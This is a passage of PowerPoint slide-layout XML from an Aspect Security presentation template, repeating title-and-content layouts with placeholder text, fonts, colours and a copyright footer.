            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="186702760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46F7C92-B666-BE4A-87BA-E45BF689715D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/17/2016</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26441536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20_Title and Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1867027604"/>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21_Title and Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1867027604"/>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22_Title and Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
